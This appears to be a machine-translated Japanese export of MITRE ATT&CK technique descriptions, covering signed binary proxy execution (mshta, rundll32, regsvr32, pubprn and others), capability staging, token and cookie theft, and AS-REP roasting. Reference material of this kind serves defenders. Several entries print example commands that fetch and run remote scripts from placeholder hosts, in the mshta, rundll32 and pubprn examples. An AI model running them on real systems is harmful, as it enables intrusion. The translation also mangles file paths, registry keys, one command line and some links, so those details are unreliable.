T1218.001 署名付きバイナリプロキシの実行。コンパイルされたHTMLファイル 敵対者は、悪意のあるコードを隠すためにコンパイルされたHTMLファイル(.chm)を悪用することがあります。CHMファイルは、MicrosoftのHTMLヘルプシステムの一部として一般的に配布されています。CHMファイルは、HTML文書、画像、VBA、JScript、Java、ActiveXなどのスクリプト/Web関連のプログラミング言語など、さまざまなコンテンツを圧縮してコンパイルしたものです。(引用:Microsoft HTML Help May 2018)CHMコンテンツは、HTMLヘルプ実行プログラム(hh.exe)によって読み込まれるInternet Explorerブラウザの基本コンポーネント(引用:Microsoft HTML Help ActiveX)を使用して表示されます。(引用:Microsoft HTML Help Executable Program)

埋め込まれたペイロードを含むカスタムCHMファイルは、被害者に配信された後、[User Execution](https://attack.mitre.org/techniques/T1204)によってトリガされる可能性があります。CHMの実行は、hh.exeによるバイナリの実行を考慮していない古いシステムやパッチが適用されていないシステムでは、アプリケーション・アプリケーション・コントロールをバイパスする可能性もあります。(引用:MsitPros CHM 2017年8月) (引用:Microsoft CVE-2017-8625 2017年8月)
456
T1218.002 署名付きバイナリプロキシの実行コントロールパネル 敵対者は、control.exeを悪用して、悪意のあるペイロードの実行を代行する可能性があります。Windowsのコントロールパネルプロセスバイナリ(control.exe)は、ユーザーがコンピュータの設定を表示および調整するためのユーティリティであるコントロールパネルアイテムの実行を処理します。

コントロールパネルアイテムは、登録された実行ファイル(.exe)またはコントロールパネル(.cpl)ファイルですが、後者は実際には<code>CPlApplet</code>機能をエクスポートするリネームされたダイナミックリンクライブラリ(.dll)ファイルです。(Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) 使いやすさを考慮して、コントロールパネルのアイテムには通常、登録してコントロールパネルにロードした後にユーザーが利用できるグラフィカルなメニューが含まれています(Citation: Microsoft Implementing CPL) コントロールパネルのアイテムは、コマンドラインから直接実行するか、アプリケーションプログラミングインターフェイス(API)呼び出しを介してプログラム的に実行するか、または単にファイルをダブルクリックして実行することができます。(引用:Microsoft Implementing CPL) (引用:TrendMicro CPL Malware Jan 2014)(引用:TrendMicro CPL Malware Dec 2013)

悪質なコントロールパネルのアイテムは、[Phishing](https://attack.mitre.org/techniques/T1566)キャンペーンで配信されたり(引用:TrendMicro CPL Malware Jan 2014)(引用:TrendMicro CPL Malware Dec 2013)、複数ステージのマルウェアの一部として実行されたりします。(引用:Palo Alto Reaver 2017年11月) コントロールパネルのアイテム、特にCPLファイルは、アプリケーションやファイル拡張子の許可リストをバイパスすることもあります。

また、敵対者は、悪意のあるDLLファイル(.dll)をコントロールパネルのファイル拡張子(.cpl)にリネームし、<code>HKCUUSoftware\Microsoft Windows\CurrentVersion\Control Panel\Cpls</code>に登録することもあります。これらの登録されたDLLは、CPLファイルの仕様に準拠しておらず、<code>CPlApplet</code>の機能をエクスポートしていない場合でも、Control Panelの実行時に<code>DllEntryPoint</code>を介してロードされ、実行されます。<code>CPlApplet</code>をエクスポートしていないCPLファイルは、直接実行することはできません。(引用:ESET InvisiMole June 2020)
457
T1218.004 署名されたバイナリプロキシの実行。InstallUtil 敵対者は、InstallUtil を使用して、信頼できる Windows ユーティリティーを介してコードの実行をプロキシする可能性があります。InstallUtil は、.NET バイナリで指定された特定のインストーラーコンポーネントを実行することで、リソースのインストールとアンインストールを可能にするコマンドラインユーティリティです。(引用元:MSDN InstallUtil)InstallUtilは、マイクロソフトのデジタル署名が入っており、Windowsシステムの.NETディレクトリにある<code>C:001:Microsoft.NET#Framework#v<version>#InstallUtil.exe</code>と<code>C:001:Microsoft.NET#Framework#64#v<version>#InstallUtil.exe</code>に配置されています。exe</code>。

InstallUtilは、<code>[System.ComponentModel.RunInstaller(true)]</code>という属性で装飾されたクラスを実行するバイナリ内の属性を使用することで、アプリケーション制御を回避するために使用されることもあります。(引用:LOLBAS Installutil)
458
T1218.005 署名付きバイナリプロキシの実行Mshta 侵入者は、mshta.exeを悪用して、悪意のある.htaファイルやJavascriptまたはVBScriptの実行を、信頼されているWindowsユーティリティーを介してプロキシで実行することがあります。初期の侵害時やコードの実行にmshta.exeを活用するさまざまなタイプの脅威の例がいくつかあります(引用:Cylance Dust Storm)(引用:Red Canary HTA Abuse Part Deux)(引用:FireEye Attacks Leveraging HTA)(引用:Airbus Security Kovter Analysis)(引用:FireEye FIN7 April 2017)

Mshta.exeは、Microsoft HTML Application(HTA)ファイルを実行するユーティリティです。(引用:Wikipedia HTML Application) HTAは、Internet Explorerと同じモデルと技術を使用して実行される、ブラウザの外にあるスタンドアロンのアプリケーションです。(引用:MSDN HTML Applications)

ファイルは、インラインスクリプトを介して mshta.exe で実行することができます。 <code>mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.sct")")</code>

また、URLから直接実行されることもあります。 <code>mshta http[:]//webserver/payload[.]hta</code>

Mshta.exeは、その潜在的な使用を考慮していないアプリケーション制御ソリューションを回避するために使用することができます。mshta.exeは、Internet Explorerのセキュリティコンテキストの外で実行されるため、ブラウザのセキュリティ設定も迂回します。(引用:LOLBAS Mshta)
459
T1218.007 署名付きバイナリプロキシの実行Msiexec msiexec.exeを悪用して、悪意のあるペイロードの実行を代行することがあります。

敵対者は、ローカルまたはネットワークでアクセス可能なMSIファイルを起動するために、msiexec.exeを悪用する可能性があります。Msiexec.exeは、DLLを実行することもできます。(引用:LOLBAS Msiexec)(引用:TrendMicro Msiexec 2018年2月) msiexec.exeは、Windowsシステムに署名されており、ネイティブであるため、その潜在的な悪用を考慮していないアプリケーション制御ソリューションを回避するために使用される可能性があります。また、<code>AlwaysInstallElevated</code>ポリシーが有効な場合、Msiexec.exeの実行がSYSTEM権限に昇格する可能性があります(引用:Microsoft AlwaysInstallElevated 2018)
460
T1218.008 署名付きバイナリプロキシの実行。Odbcconf 敵対者は、悪意のあるペイロードの実行を代理するために odbcconf.exe を悪用する可能性があります。Odbcconf.exeは、Open Database Connectivity(ODBC)ドライバとデータソース名を設定するためのWindowsユーティリティです。(引用:Microsoft odbcconf.exe)Odbcconf.exeは、Microsoft社によってデジタル署名されています。

敵対者は、odbcconf.exeを悪用して、その潜在的な悪用を考慮していないアプリケーション制御ソリューションを回避する可能性があります。Regsvr32](https://attack.mitre.org/techniques/T1218/010)と同様に、odbcconf.exeには<code>REGSVR</code>フラグがあり、DLLの実行に悪用される可能性があります(例:<code>odbcconf.exe /S /A &lbrace;REGSVR "C:Users\Public\file.dll"&rbrace;</code>)。(引用:LOLBAS Odbcconf)(引用:TrendMicro Squiblydoo Aug 2017)(引用:TrendMicro Cobalt Group Nov 2017)
461
T1218.009 Signed Binary Proxyの実行。Regsvcs/Regasm 敵対者は、RegsvcsおよびRegasmを悪用して、信頼できるWindowsユーティリティーを介してコードの実行をプロキシすることがあります。Regsvcs および Regasm は、.NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) アセンブリの登録に使用される Windows コマンドライン ユーティリティです。どちらもMicrosoft社によってデジタル署名されています。(引用:MSDN Regsvcs) (引用:MSDN Regasm)

両方のユーティリティは、登録または登録解除の前に実行されるべきコードを指定するために、バイナリ内の属性を使用することにより、アプリケーション制御をバイパスするために使用することができます:それぞれ<code>[ComRegisterFunction]</code>または<code>[ComUnregisterFunction]</code>。登録や登録解除の属性を持つコードは、不十分な権限でプロセスが実行され、実行に失敗した場合でも実行されます。(引用元:LOLBAS Regsvcs)(引用元:LOLBAS Regasm)
462
T1218.010 署名付きバイナリプロキシの実行。Regsvr32 Adversariesは、Regsvr32.exeを悪用して、悪意のあるコードの実行を代理する可能性があります。Regsvr32.exeは、Windowsシステム上でダイナミックリンクライブラリ(DLL)を含むオブジェクトのリンクおよび埋め込み制御を登録または解除するために使用されるコマンドラインプログラムです。Regsvr32.exeは、Microsoftの署名入りバイナリでもあります。(引用:Microsoft Regsvr32)

Regsvr32.exeを悪意を持って使用すると、Windowsがregsvr32.exeを通常の操作に使用していることによるアローリストや誤検出のために、regsvr32.exeプロセスの実行やロードされるモジュールを監視しないセキュリティツールのトリガを回避することができます。Regsvr32.exeは、ユーザー権限でDLLを実行するためのCOMスクリプトレットをロードする機能を使用して、アプリケーション制御を特別に回避するために使用することもできます。Regsvr32.exeはネットワークとプロキシを認識しているため、スクリプトの起動時に引数として外部のWebサーバー上のファイルへのユニフォームリソースロケータ(URL)を渡すことで、スクリプトをロードすることができます。この方法では、COMオブジェクトは実際には登録されず、実行されるだけなので、レジストリへの変更はありません。(引用:LOLBAS Regsvr32) この手法のバリエーションは、「Squiblydoo」攻撃と呼ばれることが多く、政府を標的としたキャンペーンで使用されています。(引用:Carbon Black Squiblydoo Apr 2016) (引用:FireEye Regsvr32 Targeting Mongolian Gov)

Regsvr32.exeは、[Component Object Model Hijacking](https://attack.mitre.org/techniques/T1546/015)を介して、永続性を確立するために使用されるCOMオブジェクトの登録にも活用できます。(引用:カーボンブラック・スクイブルドゥー 2016年4月)
463
T1218.011 署名付きバイナリプロキシの実行Rundll32 敵対者は、rundll32.exeを悪用して悪意のあるコードを代理実行する可能性があります。rundll32.exe を使用し、直接実行するのではなく (例: [Shared Modules](https://attack.mitre.org/techniques/T1129))、許可リストや通常の操作による誤検出のために rundll32.exe プロセスの実行を監視しないセキュリティ ツールのトリガーを回避することができます。

Rundll32.exeは、文書化されていないshell32.dll関数の<code>Control_RunDLL</code>および<code>Control_RunDLLAsUser</code>を通じて、[コントロールパネル](https://attack.mitre.org/techniques/T1218/002)アイテムファイル(.cpl)を実行するためにも使用できます。また、.cplファイルをダブルクリックすると、rundll32.exeが実行されます。(引用:Trend Micro CPL)

Rundll32は、JavaScriptなどのスクリプトの実行にも使用できます。これは、次のような構文を使用して行うことができます。 <code>rundll32.exe javascript:"˶‾᷄˵‾᷅˵";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"</code>この動作は、Poweliksなどのマルウェアで使用されていることが確認されています。(引用:This is Security Command Line Confusion)
464
T1218.012 署名付きバイナリプロキシの実行Verclsid Adversariesは、悪意のあるコードの実行を代理するためにverclsid.exeを悪用することがあります。Verclsid.exeは、Extension CLSID Verification Hostとして知られており、Windows ExplorerやWindows Shellで使用される前に、各シェル拡張機能を検証する役割を担っています。(引用:WinOSBite verclsid.exe)

敵対者は、悪意のあるペイロードを実行するためにverclsid.exeを悪用する可能性があります。これは、<code>verclsid.exe /S /C {CLSID}</code>を実行することで可能となります。このファイルは、COMオブジェクトを識別するために使用される固有の識別番号であるクラスID(CLSID)によって参照されます。verclsid.exeによって実行されるCOMペイロードは、リモートサーバーからCOMスクリプトレット(SCT)をロードして実行するなど、さまざまな悪意のある動作を行うことができる可能性があります([Regsvr32](https://attack.mitre.org/techniques/T1218/010)と同様です)。verclsid.exeは署名されており、Windowsシステム上でネイティブであるため、verclsid.exeによるプロキシ実行は、その潜在的な悪用を考慮していないアプリケーション制御ソリューションを回避できる可能性があります。(引用:LOLBAS Verclsid)(引用:Red Canary Verclsid.exe)(引用:BOHOPS Abusing the COM Registry)(引用:Nick Tyrer GitHub)
465
T1216 署名入りスクリプトのプロキシ実行 侵入者は、信頼できる証明書で署名されたスクリプトを使用して、悪意のあるファイルの実行を代理することがあります。Windowsに標準でインストールされているMicrosoft署名付きのスクリプトは、他のファイルの実行を代理するために使用されることがあります。この動作を悪用して、悪意のあるファイルを実行し、システム上のアプリケーション制御や署名検証を迂回させることができます。 466
T1216.001 署名入りスクリプトのプロキシ実行PubPrn 侵入者は、信頼できるPubPrnスクリプトを使用して悪意のあるファイルの実行をプロキシすることがあります。

<code>PubPrn.vbs</code>は、Active Directory Domain Servicesにプリンターを発行するVisual Basicスクリプトです。このスクリプトはMicrosoft社の署名が入っており、リモートサイトからのプロキシ実行に使用できます。(引用:Enigma0x3 PubPrn Bypass)コマンドの例としては、<code>cscript C[:]\WindowsSystem32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png</code>があります。
467
T1072 ソフトウェアデプロイメントツール 敵対者は、管理システム、監視システム、展開システムなど、企業ネットワーク内にインストールされているサードパーティ製ソフトウェア・スイートにアクセスし、これを使用してネットワーク内を横移動することがあります。

サードパーティ製のネットワーク全体または企業全体のソフトウェアシステムにアクセスすると、敵対者は、そのようなシステムに接続されているすべてのシステム上でリモートコードを実行できるようになる場合があります。このアクセスは、他のシステムへの横移動、情報収集、またはすべてのエンドポイントのハードドライブのワイプなどの特定の効果を引き起こすために使用される場合があります。

このアクションに必要な権限は、システム構成によって異なります。サードパーティ製システムへの直接アクセスでは、ローカルの認証情報で十分な場合もあれば、特定のドメインの認証情報が必要な場合もあります。ただし、システムにログインしたり、本来の目的を果たすためには、管理者アカウントが必要になる場合があります。
468
T1518 ソフトウェアディスカバリー 敵対者は、システムやクラウド環境にインストールされているソフトウェアやソフトウェア バージョンのリストを取得しようとする場合があります。

敵対者は、どのようなセキュリティ対策が施されているか、あるいは侵害されたシステムに[Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)に対して脆弱なソフトウェアのバージョンがあるかどうかなど、さまざまな理由でソフトウェアの列挙を試みることがあります。
469
T1518.001 ソフトウェア・ディスカバリーセキュリティソフトウェアの発見 敵対者は、システムやクラウド環境にインストールされているセキュリティソフトウェア、設定、防御ツール、センサーなどのリストを入手しようとすることがあります。これには、ファイアウォールのルールやアンチウイルスなどが含まれる場合があります。敵対者は、自動検出中に[Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)から得た情報を利用して、敵対者がターゲットを完全に感染させるかどうかや、特定のアクションを試みるかどうかなど、その後の行動を形成することがあります。

セキュリティソフトウェアの情報を得るために使用できるコマンドの例としては、[netsh](https://attack.mitre.org/software/S0108)、[Reg](https://attack.mitre.org/software/S0075)による<code>reg query</code>、[cmd](https://attack.mitre.org/software/S0106)による<code>dir</code>、[Tasklist](https://attack.mitre.org/software/S0057)などがありますが、発見行動の他の指標は、敵対者が探しているソフトウェアやセキュリティ システムの種類により固有のものである可能性があります。macOSのマルウェアがLittleSnitchやKnockKnockソフトウェアのチェックを行うことが一般的になってきています。

また、敵対者はクラウドのAPIを利用して、環境内のファイアウォールルールの設定を発見することもあります。(引用:Expel IO Evil in AWS)
470
T1608 ステージ機能 敵対者は、ターゲット時に使用できる能力をアップロード、インストール、またはその他の方法で設定することがあります。作戦を支援するために、敵対者は自分が開発した([Develop Capabilities](https://attack.mitre.org/techniques/T1587))、または入手した([Obtain Capabilities](https://attack.mitre.org/techniques/T1588))能力を、自分の管理下にあるインフラにステージングする必要があるかもしれません。これらの能力は、敵対者が以前に購入/レンタルした([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583))、あるいは敵対者によって侵害された([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584))インフラ上でステージングされることがあります。また、GitHubやPastebinなどのウェブサービス上に能力をステージングすることもできます。(引用:Volexity Ocean Lotus November 2020)

能力のステージングは、敵対者の初期アクセスや侵害後の行動を助けることができ、以下のようなものがあります(ただし、これらに限定されません):

* [Drive-by Compromise](https://attack.)を行うために必要なウェブリソースのステージング。(引用:FireEye CFR Watering Hole 2012)(引用:Gallagher 2015)(引用:ATT ScanBox)
* スピアフィッシングで使用するリンクターゲット用のウェブリソースをステージングします。(引用:Malwarebytes Silent Librarian 2020年10月)(引用:Proofpoint TA407 2019年9月)
* 犠牲者のネットワークにアクセス可能な場所にマルウェアやツールをアップロードし、[Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)を可能にする。(引用:Volexity Ocean Lotus 2020年11月)
* コマンド&コントロール・トラフィックの暗号化に使用するために、以前に取得したSSL/TLS証明書をインストールする(例:[Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002)を[Web Protocols](https://attack.mitre.org/techniques/T1071/001)を使用する)。(引用:DigiCert Install SSL Cert)
471
T1608.004 ステージ・キャパシティドライブ・バイ・ターゲット 敵対者は、通常のブラウジングでWebサイトを訪れたシステムを感染させるための運用環境を用意することがあります。エンドポイントシステムは、[Drive-by Compromise](https://attack.mitre.org/techniques/T1189)のように、敵対者が管理するサイトを閲覧することで感染する場合があります。このようなケースでは、ユーザーのウェブブラウザが悪用の対象となるのが一般的ですが(多くの場合、サイトにアクセスした後にユーザーが余計な操作をする必要はありません)、敵対者は、[Application Access Token](https://attack.mitre.org/techniques/T1550/001)のように、悪用されない動作をするようにウェブサイトを設定することもあります。ドライブ・バイ・コンプロマイズ](https://attack.mitre.org/techniques/T1189)の前に、敵対者は、敵対者が管理するサイトを閲覧したユーザーにエクスプロイトを配信するために必要なリソースをステージングする必要があります。ドライブ・バイ・コンテンツは、敵対者が管理するインフラを取得したり([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583))、以前に侵害されたもの([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584))をステージングすることができます。

敵対者は、[JavaScript](https://attack.mitre.org/techniques/T1059/007)などの悪意のあるWebコンテンツをWebサイトにアップロードまたは注入することがあります。(引用:FireEye CFR Watering Hole 2012)(引用:Gallagher 2015) これは、悪意のあるスクリプトをWebページや、フォーラムの投稿などのユーザが制御可能なWebコンテンツに挿入するなど、さまざまな方法で行われます。また、敵対者は、悪意のあるウェブ広告を作成し、正規の広告プロバイダを通じてウェブサイトの広告スペースを購入することもあります。ユーザーのウェブブラウザを悪用するためにコンテンツを作成するだけでなく、スクリプトコンテンツを作成してユーザーのブラウザをプロファイリングし([Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)のように)、悪用を試みる前にブラウザが脆弱であることを確認することもあります。(引用:ATT ScanBox)

敵対者によって侵害され、ドライブバイのステージングに使用されるウェブサイトは、政府、特定の産業、地域などの特定のコミュニティが訪問するものであり、共通の関心事に基づいて特定のユーザーまたは一連のユーザーを危険にさらすことを目的としている場合があります。

敵対者は、「ドライブバイ・コンプロマイズ」(https://attack.mitre.org/techniques/T1189)を容易にするために、インフラの取得(「ドメイン」(https://attack.mitre.org/techniques/T1583/001))の際に、正規のドメインに似たドメイン(例:ホモグリフ、タイポスクワッティング、異なるトップレベルドメインなど)を購入することがあります。
472
T1608.003 Stage Capabilities:デジタル証明書のインストール 敵対者がSSL/TLS証明書をインストールし、ターゲット時に使用することがあります。SSL/TLS証明書は、システム間の安全な通信を可能にするために、サーバーにインストールすることができるファイルです。デジタル証明書には、鍵に関する情報、所有者の身元に関する情報、証明書の内容が正しいことを検証した団体のデジタル署名が含まれています。署名が有効で、証明書を検証する人が署名者を信頼していれば、その鍵を使って所有者と安全に通信できることがわかります。証明書をサーバーにアップロードし、その証明書を使用してサーバーとの暗号化通信ができるようにサーバーを設定することができます。(引用:DigiCert Install SSL Cert)

敵対者は、C2 トラフィックを暗号化したり(例:[Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001))、クレデンシャルハーベスティングサイトに信用を与えたりするなど、自分たちの活動を促進するために SSL/TLS 証明書をインストールすることがあります。電子証明書のインストールは、Web サーバや電子メール サーバなど、さまざまな種類のサーバに対して行われる可能性があります。

敵対者は、電子証明書を取得するか([Digital Certificates](https://attack.mitre.org/techniques/T1588/004)を参照)、自己署名証明書を作成することができます([Digital Certificates](https://attack.mitre.org/techniques/T1587/003)を参照)。デジタル証明書は、取得された([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583))、または以前に侵害された([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584))、敵対者が管理するインフラストラクチャにインストールすることができます。
473
T1608.005 Stage Capabilities。リンクターゲット 敵対者は、リンクから参照されるリソースを設置して、標的化の際に使用することができます。敵対者は、[Malicious Link](https://attack.mitre.org/techniques/T1204/001)のように、ユーザーが悪意のあるリンクをクリックすることで、情報(認証情報を含む)を漏らしたり、実行を促したりすることがあります。リンクは、ソーシャルエンジニアリングのテキストを添付した電子メールを送信して、ユーザーに積極的にURLをクリックさせたり、ブラウザにコピー&ペーストさせたりするなど、スピアフィッシングに使用することができます。情報を得るためのフィッシング([Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)など)や、システムへの初期アクセスを得るためのフィッシング([Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)など)を行う前に、敵対者は、スピアフィッシング・リンクのリンク先のリソースを設定する必要があります。

一般的に、リンクターゲットのリソースはHTMLページで、ユーザーに提供するコンテンツを決定するために[JavaScript](https://attack.mitre.org/techniques/T1059/007)などのクライアントサイドスクリプトが含まれていることがあります。敵対者は、正規のサイトを複製してリンクターゲットとすることがあります。これには、正規のWebサービスのログインページや組織のログインページを複製して、[Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)の際に認証情報を取得しようとすることが含まれます。(引用: Malwarebytes Silent Librarian October 2020)(引用: Proofpoint TA407 September 2019) また、敵対者は、[Upload Malware](https://attack.mitre.org/techniques/T1608/001)と称して、リンクターゲットがユーザーによるダウンロード/実行用のマルウェアを指すようにすることもあります。

敵対者は、【悪意のあるリンク】(https://attack.mitre.org/techniques/T1204/001)を容易にするために、インフラの取得時(【ドメイン】(https://attack.mitre.org/techniques/T1583/001))に、正規のドメインに似たドメイン(例:ホモグリフ、タイポスクワッティング、異なるトップレベルドメインなど)を購入することがあります。また、リンク短縮サービスを利用することもできます。
474
T1608.001 ステージの実力。マルウェアのアップロード 敵対者は、サードパーティや敵対者が管理するインフラにマルウェアをアップロードして、標的化の際にアクセスできるようにすることがあります。悪意のあるソフトウェアには、ペイロード、ドロッパー、侵害後のツール、バックドア、その他さまざまな悪意のあるコンテンツが含まれます。敵対者は、自らの活動を支援するためにマルウェアをアップロードすることがあります。例えば、ペイロードをインターネットでアクセス可能なWebサーバに置くことで、犠牲者のネットワークが[Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)を利用できるようにします。

マルウェアは、敵対者が以前に購入/レンタルしたインフラ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583))や、敵対者によって侵害されたインフラ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584))に置かれることがあります。マルウェアは、GitHubやPastebinなどのWebサービス上でステージングされることもあります(引用:Volexity Ocean Lotus November 2020)

敵対者は、アプリケーションのバイナリ、仮想マシンイメージ、コンテナイメージなどのバックドアされたファイルを、サードパーティのソフトウェアストアやリポジトリ(例:GitHub、CNET、AWS Community AMI、Docker Hub)にアップロードすることがあります。偶然の出会いにより、被害者は[User Execution](https://attack.mitre.org/techniques/T1204)を介して、これらのバックドアされたファイルを直接ダウンロード/インストールする可能性があります。[Masquerading](https://attack.mitre.org/techniques/T1036)は、ユーザーがこれらのファイルを誤って実行する可能性を高めます。
475
T1608.002 ステージ機能。アップロードツール 敵対者は、サードパーティまたは敵対者が管理するインフラにツールをアップロードして、ターゲット時にアクセスできるようにすることがあります。ツールは、オープンソースでもクローズドソースでも、無料でも商用でもよい。ツールは敵対者によって悪意のある目的で使用されることがありますが、(マルウェアとは異なり)そのような目的で使用されることを意図していません(例:[PsExec](https://attack.mitre.org/software/S0029))。敵対者は、自らの活動を支援するためにツールをアップロードすることがあります。例えば、インターネットでアクセス可能なWebサーバにツールを置くことで、犠牲者のネットワークがツールを利用できるようにし、[Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)を可能にします。

ツールは、敵対者が以前に購入/レンタルしたインフラ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583))や、敵対者によって侵害されたインフラ([Compromise Infrastructure](https://attack.))に置かれることがあります。

敵対者は、侵害された被害者のマシンに、ツールのオリジナルのホスティングサイトを含む第三者のホスティングロケーション(例:敵対者が管理していないGitHubレポ)からツールを直接ダウンロードさせることで、ツールをアップロードする必要性を回避することができます。
476
T1528 アプリケーションアクセストークンの盗用 敵対者は、リモートシステムやリソースにアクセスするための認証情報を取得する手段として、ユーザのアプリケーションアクセストークンを盗むことができます。これはソーシャルエンジニアリングによって起こる可能性があり、通常、アクセスを許可するためにユーザーのアクションを必要とします。

アプリケーションアクセストークンは、ユーザーに代わって認可されたAPIリクエストを行うために使用され、クラウドベースのアプリケーションやSaaS(Software-as-a-Service)のリソースにアクセスする方法として一般的に使用されています。(Citation:Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019)OAuthは、システムへのアクセスのためにユーザーにトークンを発行する、一般的に実装されているフレームワークの1つです。クラウドベースのサービスや保護されたAPIへのアクセスを希望するアプリケーションは、さまざまな認証プロトコルを介してOAuth 2.0を使用してエントリーすることができます。一般的に使用されているシーケンスの例としては、MicrosoftのAuthorization Code Grantフローがあります。(引用:Microsoft Identity Platform Protocols May 2019)(引用:Microsoft - OAuth Code Authorization flow - June 2019) OAuthアクセストークンにより、サードパーティアプリケーションは、ユーザー認証情報を取得することなく、アプリケーションが要求する方法で、ユーザーデータを含むリソースと対話することができます。

敵対者は、ターゲットユーザーのOAuthトークンでリソースへのアクセスが許可されるように設計された悪意のあるアプリケーションを構築することで、OAuth認証を利用することができます。敵対者は、Azure Portal、Visual Studio IDE、コマンドラインインターフェース、PowerShell、REST APIコールなどを使用して、Microsoft Identity Platformなどの認可サーバーへのアプリケーションの登録を完了させる必要があります(引用:Microsoft - Azure AD App Registration - May 2019)その後、[Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)を介してターゲットユーザーにリンクを送信し、アプリケーションへのアクセスを許可するように誘導します。OAuthアクセストークンが付与されると、アプリケーションは[Application Access Token](https://attack.mitre.org/techniques/T1550/001)を通じて、ユーザーアカウントの機能への潜在的に長期的なアクセスを得ることができます(引用:Microsoft - Azure AD Identity Tokens - Aug 2019)

Gmail、Microsoft Outlook、Yahoo Mailのユーザーを標的としたアドバーサリーが確認されています(引用:Amnesty OAuth Phishing Attacks, August 2019)(引用:Trend Micro Pawn Storm OAuth 2017)
477
T1539 ウェブセッションクッキーの盗用 敵対者は、Web アプリケーションやサービスのセッション・クッキーを盗み、それを利用して、認証情報を必要とせずに、認証されたユーザとして Web アプリケーションやインターネット・サービスにアクセスすることができます。Web アプリケーションやサービスは、ユーザが Web サイトを認証した後に、認証トークンとしてセッ ション・クッキーを使用することがよくあります。

クッキーは、Web アプリケーションが活発に使用されていなくても、長期間有効であることがよくあります。クッキーは、ディスク上、ブラウザのプロセスメモリ上、およびリモートシステムへのネットワークトラフィック上に存在します。さらに、ターゲットマシン上の他のアプリケーションが、機密性の高い認証クッキーをメモリに保存している可能性があります(クラウドサービスに認証を行うアプリケーションなど)。セッションクッキーは、いくつかの多要素認証プロトコルをバイパスするために使用することができます。(引用:Pass The Cookie)

ローカルシステム上のウェブブラウザからのクッキーをターゲットにしたマルウェアの例がいくつかあります。(引用:Kaspersky TajMahal 2019年4月)(引用:Unit 42 Mac Crypto Cookies 2019年1月) また、Evilginx 2やMuraenaなどのオープンソースフレームワークには、中間者プロキシを介してセッションクッキーを収集することができるものがあり、敵対者が設定してフィッシングキャンペーンに使用することができます。(Citation: Github evilginx2)(Citation: GitHub Mauraena)

敵対者が有効なクッキーを取得した後、[Web Session Cookie](https://attack.mitre.org/techniques/T1550/004)という手法を実行して、対応するウェブアプリケーションにログインすることができます。
478
T1558 Kerberosのチケットを盗む、または偽造する Adversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003).

Kerberosは、最近のWindowsドメイン環境で広く使われている認証プロトコルである。レルム」と呼ばれるKerberos環境では、クライアント、サービス、およびキー・ディストリビューション・センター(KDC)という3つの基本的な参加者が存在する(引用:ADSecurity Kerberos Ring Decoder)。クライアントはサービスへのアクセスを要求し、KDCから発信されるKerberosチケットの交換を通じて、認証に成功した後にアクセスを許可される。KDCは、認証とチケットの付与の両方に責任を持つ。 攻撃者は、不正なアクセスを可能にするために、チケットを盗んだり、チケットを偽造したりして、Kerberosを悪用しようとする可能性がある。
479
T1558.004 Kerberosのチケットを盗む、または偽造する。AS-REP Roasting 敵対者は、[Password Cracking](https://attack.mitre.org/techniques/T1110/002)のKerberosメッセージによって、Kerberosの事前認証を無効にしているアカウントの認証情報を明らかにする可能性があります。(Citation: Harmj0y Roasting AS-REPs Jan 2017)

事前認証は、オフラインの[Password Cracking](https://attack.mitre.org/techniques/T1110/002)に対する保護を提供します。有効にすると、リソースへのアクセスを要求するユーザーは、パスワードのハッシュで暗号化されたタイムスタンプ付きの認証サーバー要求(AS-REQ)メッセージを送信することで、ドメインコントローラ(DC)との通信を開始します。DCは、ユーザーのパスワードのハッシュを含むタイムスタンプの復号化に成功した場合にのみ、ユーザーにチケット付与チケット(TGT)を含む認証サーバー応答(AS-REP)メッセージを送信します。AS-REPメッセージの一部は、ユーザーのパスワードで署名されています。(引用:Microsoft Kerberos Preauth 2014)

事前認証を行わずに見つかった各アカウントに対して、敵対者は暗号化されたタイムスタンプを含まないAS-REQメッセージを送信し、RC4などの安全ではないアルゴリズムで暗号化されている可能性のあるTGTデータを含むAS-REPメッセージを受信する可能性があります。回収された暗号化されたデータは、[Kerberoasting](https://attack.mitre.org/techniques/T1558/003)と同様に、オフラインの[Password Cracking](https://attack.mitre.org/techniques/T1110/002)攻撃に対して脆弱であり、平文の認証情報を暴露する可能性があります。(Citation: Harmj0y Roasting AS-REP Jan 2017)(Citation: Stealthbits Cracking AS-REP Roasting Jun 2019)

特別な権限の有無にかかわらず、ドメインに登録されているアカウントは、LDAPフィルタで[PowerShell](https://attack.mitre.org/techniques/T1059/001)のようなWindowsツールを利用することで、事前認証が無効になっているすべてのドメインアカウントをリストアップするために悪用することができます。あるいは、敵対者は、各ユーザーに対してAS-REQメッセージを送信することができる。DCがエラーなく応答した場合、そのアカウントは事前認証を必要とせず、AS-REPメッセージにはすでに暗号化されたデータが含まれていることになります。(引用:Harmj0y Roasting AS-REP Jan 2017)(引用:Stealthbits Cracking AS-REP Roasting Jun 2019)

